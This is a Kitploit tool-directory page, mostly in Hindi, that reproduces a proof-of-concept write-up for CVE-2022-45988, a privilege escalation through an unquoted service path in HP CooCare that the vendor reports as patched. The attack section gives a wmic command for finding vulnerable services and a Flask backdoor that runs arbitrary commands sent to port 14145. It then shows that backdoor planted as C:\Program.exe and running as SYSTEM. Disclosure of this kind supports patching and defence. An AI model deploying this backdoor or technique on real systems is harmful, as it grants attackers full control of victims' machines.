Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-45988 — CVE-2022-45988 StarSoftComm HP CooCare एक विशेषाधिकार वृद्धि भेद्यता मौजूद है | Kitploit
उपकरण/GitHubGitHub/happy0717/cve-2022-45988
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubhappy0717/cve-2022-45988

CVE-2022-45988

CVE-2022-45988 StarSoftComm HP CooCare एक विशेषाधिकार वृद्धि भेद्यता मौजूद है

रिपॉजिटरी देखें
33 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-45988 StarSoftComm HP CooCare में एक विशेषाधिकार उन्नयन भेद्यता मौजूद है

####################################################

मैंने hp-security-alert से संपर्क किया है, उन्होंने इस बग को ठीक कर दिया है। StarSoftComm CooCare के बारे में [HP-PSRT-IR #4106] image विक्रेता ने निम्नलिखित जानकारी प्रदान की:

अद्यतन करने के लिए इन चरणों का पालन करें:

  1. eService लॉन्च करें
  2. लगभग 3 मिनट प्रतीक्षा करें
  3. eService को बंद करें और पुनः लॉन्च करें।
  4. जाँच करें कि संस्करण v5.364 या उससे नया है।

#####################################

StarSoftComm HP CooCare में एक विशेषाधिकार उन्नयन भेद्यता मौजूद है जो हमलावर को अपने विशेषाधिकार स्तर को बढ़ाने की अनुमति दे सकती है। e管家超级版是HP星14 pro 自带的一款远程诊断软件,该软件为StarSoftComm(软通科技)旗下产品

test on windows 11 22621.819 HP LAPTOP HP Pavilion Plus 14 英寸笔记本电脑 14-eh0000 (56D77AV)

प्रभावित संस्करण: CooCare v5.364 से नीचे

#भेद्यता पुनरुत्पादन

#पहला चरण: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ सेवा ढूँढें (使用上述CMD命令找到未引用的服务)

image

सेवा का नाम Windows Application Management Service = AKA = WinAppMgmt है
服务的名称叫做Windows Application Management Service 简称是WinAppMgmt

image

सेवा StarSoftComm CooCare से है

image

#चरण 2: एक दुर्भावनापूर्ण प्रोग्राम तैयार करें

image

root@kitploit:~
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/')
def hello_world():
    r = request.args.getlist('cmd')  #Reception? cmd= parameter
    a=os.popen(r[0])  #Execute system commands
    l = a.read()
    return l  #return

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=14145, debug=True)  #Listen HTTP port 14145

मैं python3 flask का उपयोग करके एक दुर्भावनापूर्ण exe लिख रहा था। यह HTTP पोर्ट 14145 पर सुन सकता है और सिस्टम कमांड निष्पादित कर सकता है।

कमांड pyinstaller.exe --onefile --windowed -F -w python_test.py का उपयोग करके एक दुर्भावनापूर्ण exe बनाएं।

#चरण 3: मैलवेयर को पथ C:\ में रखें और मैलवेयर का नाम बदलकर Program.exe करें

image

#चरण 4: Windows Application Management Service प्रारंभ करें

यदि Windows Application Management Service पहले से प्रारंभ है, तो आप इसे पुनः प्रारंभ कर सकते हैं

image

#चरण 5: Windows Application Management Service के प्रारंभ होने की प्रतीक्षा करें और सिस्टम कमांड निष्पादित करें C:\Program.exe system के रूप में चलता है

जब मैं Taskmgr.exe में Windows Application Management Service को SYSTEM के रूप में चलता देखता हूँ, तब मैं ब्राउज़र खोलकर http://127.0.0.1:14145?cmd=whoami इनपुट कर सकता हूँ

प्रतीक्षा करें..........

इसके लिए...

इसे।

NT SYSTEM

image

टूल डाउनलोड करें